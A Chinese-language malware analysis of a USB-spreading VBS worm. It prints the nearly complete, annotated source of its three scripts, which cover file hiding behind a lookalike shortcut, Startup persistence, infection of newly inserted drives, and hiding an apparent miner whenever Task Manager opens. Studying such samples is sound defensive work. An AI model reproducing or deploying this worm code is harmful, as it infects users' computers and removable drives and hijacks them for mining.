U盘作为便携式移动存储设备,具备使用场景广泛、设备插拔频繁、跨设备传输数据的特点,是恶意病毒传播扩散的主要载体之一。各类轻量型脚本病毒依托U盘的传播特性,能够实现无感感染、持久驻留、批量扩散,对个人终端设备及数据安全造成极大威胁。本文所分析的恶意程序为一款基于VBS脚本开发的U盘传播型病毒,该病毒代码体量精简,整体不足三百行,却集成了终端感染、开机自启、U盘监测、跨设备传播、规避查杀等完整恶意功能,结构完整、逻辑清晰。通过对病毒文件结构、感染机制、传播流程及核心代码特征的深度分析,结合脚本残留关键指令特征,可初步判定该病毒配套存在挖矿恶意程序。为明确该病毒的攻击原理、传播路径与潜在危害,本文对其文件构成、双向感染流程及核心恶意特征进行全面拆解分析,为该类U盘脚本病毒的识别、查杀与防御提供参考依据。
一、现象
此病毒侵入 U 盘后,会在 U 盘根目录生成两个系统隐藏文件夹与一个U盘卷标同名快捷方式:两个系统属性隐藏文件夹分别命名为 _和 WindowsServices。其中_文件夹用于转移存储 U 盘内用户原有全部文件;WindowsServices 文件夹内置三类病毒脚本:movemenoreg.vbs、installer.vbs、helper.vbs。查阅病毒源码可知该目录本应包含第四个程序 WindowsServices.exe,当前样本 U 盘未出现该文件;生成的快捷方式名称与 U 盘原有盘符 / 卷标名称完全一致。
病毒文件列表:

点开快捷方式后可见到U盘内所有的原始文件

WindowsServices目录包含病毒VBS脚本文件

二、源代码解读
2.1 快捷方式文件
快捷方式文件是入口,用来恶意引导用户点击启动病毒的主体文件。快捷方式的目标如下:
%COMSPEC% /C .\WindowsServices\movemenoreg.vbs
其中,%COMSPEC% 是环境变量,指的是 C:\Windows\system32\cmd.exe。这里是用 cmd.exe 打开病毒文件 movemenoreg.vbs。
2.2 movemenoreg .vbs 文件内容
'发生错误时,程序将继续执行下一句代码
on error resume next
'定义系统变量
Dim strPath, objws, objFile, strFolder, Target, destFolder, objDestFolder, AppData, ws, objmove, pfolder, objWinMgmt, colProcess, vaprocess
'获得WScript.Shell
Set ws = WScript.CreateObject("WScript.Shell")
Target = "\WindowsServices"
'打开根目录下名为‘_’的目录,是存放用户所有原始文件的目录
strPath = WScript.ScriptFullName
set objws = CreateObject("Scripting.FileSystemObject")
Set objFile = objws.GetFile(strPath)
strFolder = objws.GetParentFolderName(objFile)
pfolder = objws.GetParentFolderName(strFolder)
'VB/VBScript 中,Chr(数字) 用于把 ASCII 码转为对应字符;ASCII 34 对应双引号 ",所以 Chr(34)是双引号"
ws.Run Chr(34) & pfolder & "\_" & Chr(34)
'AppData为用户数据目录,具体位置是C:\Users\用户名\AppData\Roaming
AppData = ws.ExpandEnvironmentStrings("%AppData%")
DestFolder = AppData & Target
'创建目标目录,也就是%AppData%\WindowsServices目录
if (not objws.folderexists(DestFolder)) then
objws.CreateFolder DestFolder
Set objDestFolder = objws.GetFolder(DestFolder)
end if
'将四个病毒文件复制到目标目录并设置系统隐藏属性。
'这种属性,用户使用文件夹选项勾选“显示隐藏文件”,但是不选择“隐藏受保护的操作系统文件(推荐)”时,不可见
Call moveandhide ("\helper.vbs")
Call moveandhide ("\installer.vbs")
Call moveandhide ("\movemenoreg.vbs")
Call moveandhide ("\WindowsServices.exe")
objDestFolder.Attributes = objDestFolder.Attributes + 39
sub moveandhide (name)
if (not objws.fileexists(DestFolder & name)) then
'复制文件
objws.CopyFile strFolder & name, DestFolder & "\"
Set objmove = objws.GetFile(DestFolder & name)
'系统隐藏文件(39表示文件属性为归档、系统、隐藏)
If not objmove.Attributes AND 39 then
objmove.Attributes = 0
objmove.Attributes = objmove.Attributes + 39
end if
end if
end sub
Set objWinMgmt = GetObject("WinMgmts:Root\Cimv2")
'WinMgmts: 是 VBScript、WMI 脚本里的WMI 专用对象前缀,用于快速连接 Windows WMI 服务;
'Root\CIMv2 是 Windows 默认、最核心的 WMI 命名空间,存放系统硬件、进程、文件、服务、注册表、磁盘等绝大多数系统信息。
'拼接完整:GetObject("WinMgmts:Root\Cimv2"),作用是建立本机 WMI 管理对象。
Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name = 'wscript.exe'")
'调用WMI管理对象,查找helper.vbs是否已经运行,如果已经运行就退出当前脚本。
For Each objProcess In colProcess
vaprocess = objProcess.CommandLine
if instr(vaprocess, "helper.vbs") then
WScript.quit
End if
Next
'运行helper.vbs
ws.Run Chr(34) & DestFolder & "\helper.vbs" & Chr(34)
Set ws = Nothing
2.3 helper .vbs 文件
on error resume next
Dim ws, strPath, objws, objFile, strFolder, startupPath, MyScript, objWinMgmt, colProcess, vaprocess, miner, tskProcess, nkey, key
Set ws = WScript.CreateObject("WScript.Shell")
nkey = "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\StartupFolder\helper.lnk"
Set objWinMgmt = GetObject("WinMgmts:Root\Cimv2")
strPath = WScript.ScriptFullName
set objws = CreateObject("Scripting.FileSystemObject")
Set objFile = objws.GetFile(strPath)
strFolder = objws.GetParentFolderName(objFile)
strPath = strFolder & "\"
'获得用户启动目录路径
startupPath = ws.SpecialFolders("startup")
miner = Chr(34) & strPath & "WindowsServices.exe" & Chr(34)
MyScript = "helper.vbs"
While True
'检查注册表,如果未修改,则修改注册表启动项
key = Empty
key = ws.regread (nkey)
If (not IsEmpty(key)) then
ws.RegWrite nkey, 2, "REG_BINARY"
End if
If (not objws.fileexists(startupPath & "\helper.lnk")) then
'在启动目录创建helper.vbs启动快捷方式
Set link = ws.CreateShortcut(startupPath & "\helper.lnk")
link.Description = "helper"
link.TargetPath =chr(34) & strPath & "helper.vbs" & chr(34)
link.WorkingDirectory = strPath
link.Save
End If
Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name = 'wscript.exe'")
'检查installer.vbs文件是否在执行,如果不在则运行installer.vbs
call procheck(colProcess, "installer.vbs")
Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name Like '%WindowsServices.exe%'")
Set tskProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name Like '%Taskmgr.exe%'")
if colProcess.count = 0 And tskProcess.count = 0 then
'运行WindowsServices.exe
ws.Run miner, 0
ElseIf colProcess.count > 0 And tskProcess.count > 0 then
'如果用户打开了任务管理器,就结束WindowsServices.exe
For Each objProcess In colProcess
ws.run "taskkill /PID " & objProcess.ProcessId , 0
Next
end if
WScript.Sleep 3000
Wend
'---------------------------------------------------------------------------------
sub procheck(checkme, procname)
For Each objProcess In checkme
vaprocess = objProcess.CommandLine
if instr(vaprocess, procname) then
Exit sub
End if
Next
ws.Run Chr(34) & strPath & procname & Chr(34)
end sub
'--------------------------------------------------------------------------------
2.4 installer .vbs 文件
installer.vbs 文件进行感染新 U盘操作
on error resume next
DIM colEvents, objws, strComputer, objEvent, DestFolder, strFolder, Target, ws, objFile, objWMIService, DummyFolder, check, number, home, device, devicename, colProcess, vaprocess, objWinMgmt
strComputer = "."
Set ws = WScript.CreateObject("WScript.Shell")
Target = "\WindowsServices"
'where are we?
strPath = WScript.ScriptFullName
set objws = CreateObject("Scripting.FileSystemObject")
Set objFile = objws.GetFile(strPath)
strFolder = objws.GetParentFolderName(objFile)
'Checking for USB instance
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
'查询硬盘事件
Set colEvents = objWMIService.ExecNotificationQuery ("SELECT * FROM __InstanceOperationEvent WITHIN 1 WHERE " & "TargetInstance ISA 'Win32_LogicalDisk'")
Set objWinMgmt = GetObject("WinMgmts:Root\Cimv2")
While True
'检查helper.vbs是否在执行,如果不在执行,则运行help.vbs
Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name = 'wscript.exe'")
call procheck(colProcess, "helper.vbs")
'取出下一个事件
Set objEvent = colEvents.NextEvent
If objEvent.TargetInstance.DriveType = 2 Then
If objEvent.Path_.Class = "__InstanceCreationEvent" Then
'一个新的U盘插入
device = objEvent.TargetInstance.DeviceID
devicename = objEvent.TargetInstance.VolumeName
DestFolder = device & "\WindowsServices"
DummyFolder = device & "\" & "_"
'在U盘根目录下创建目的目录(\WindowsServices)
if (not objws.folderexists(DestFolder)) then
objws.CreateFolder DestFolder
Set objDestFolder = objws.GetFolder(DestFolder)
objDestFolder.Attributes = objDestFolder.Attributes + 39
end if
'将四个病毒文件移动到目的目录
Call moveandhide ("\helper.vbs")
Call moveandhide ("\installer.vbs")
Call moveandhide ("\movemenoreg.vbs")
Call moveandhide ("\WindowsServices.exe")
'在U盘根目录下创建打开movemenoreg.vbs文件的快捷方式
if (not objws.fileexists (device & devicename & ".lnk")) then
Set link = ws.CreateShortcut(device & "\" & devicename & ".lnk")
link.IconLocation = "%windir%\system32\SHELL32.dll, 7"
link.TargetPath = "%COMSPEC%"
link.Arguments = "/C .\WindowsServices\movemenoreg.vbs"
link.windowstyle = 7
link.Save
End If
'在U盘根目录下创建名为‘_’的目录并隐藏
if (not objws.folderexists(DummyFolder)) then
objws.CreateFolder DummyFolder
Set objDestFolder = objws.GetFolder(DummyFolder)
objDestFolder.Attributes = objDestFolder.Attributes + 2 + 4
End If
set check = objws.getFolder(device)
'将用户文件都移动到名为‘_’的目录下
Call checker(check)
End If
End If
Wend
sub checker (path)
set home = path.Files
For Each file in home
Select Case file.Name
Case devicename & ".lnk"
'nothings
Case Else
objws.MoveFile path & file.Name, DummyFolder & "\"
End Select
Next
set home = path.SubFolders
For Each home in home
Select Case home
Case path & "_"
'nothings
Case path & "WindowsServices"
'nothings
Case path & "System Volume Information"
'nothings'
Case Else
objws. MoveFolder home, DummyFolder & "\"
End Select
Next
end sub
'------------------------------------------------------------
sub moveandhide (name)
if (not objws.fileexists(DestFolder & name)) then
objws.CopyFile strFolder & name, DestFolder & "\"
Set objmove = objws.GetFile(DestFolder & name)
If not objmove.Attributes AND 39 then
objmove.Attributes = 0
objmove.Attributes = objmove.Attributes + 39
end if
end if
end sub
'------------------------------------------------------------
sub procheck(checkme, procname)
For Each objProcess In checkme
vaprocess = objProcess.CommandLine
if instr(vaprocess, procname) then
Exit sub
End if
Next
ws.Run Chr(34) & strFolder & "\" & procname & Chr(34)
end sub
三、工作流程
3.1 U 盘向计算机传播感染流程
已被病毒侵染的 U 盘接入电脑后,若用户双击 U 盘根目录内的同名快捷方式,恶意程序便会触发执行:病毒本体自动拷贝至系统 %AppData%\WindowsServices文件夹,同时写入开机自启配置实现持久驻留。此后该恶意程序会持续监测移动存储设备接入状态,一旦检测到新 U 盘插入,立刻将全套病毒文件复制至该 U 盘完成扩散。
3.2 主机反向感染 U 盘机制
已被病毒入侵的计算机开机后,恶意程序会随系统自动加载驻留后台。
当监测到有移动 U 盘接入时,病毒会在该 U 盘根目录创建
_与WindowsServices两个隐藏文件夹;
其一将 U 盘内用户全部原始文件迁移存放至_目录;
其二把全套四份恶意程序写入WindowsServices目录。同时在 U 盘根目录生成快捷方式。双击该快捷方式会直接启动恶意脚本
movemenoreg.vbs,完成对 U 盘的完整感染。
四、总结
该 VBS 恶意脚本代码不足三百行,但完整实现主机感染、U 盘传播、对抗查杀等核心恶意功能;
脚本变量命名、功能模块划分规范,编写者具备成熟的 VBS 与恶意程序开发经验。
样本缺失
WindowsServices.exe文件,无法判定攻击者完整意图,不过结合helper.vbs中这段调用该程序的代码特征,可推断其配套程序大概为挖矿程序。
miner = Chr(34) & strPath & "WindowsServices.exe" & Chr(34)
郑重声明:本文对该病毒源代码进行分析,只为学习和传播知识使用,一切后果与本文作者无关!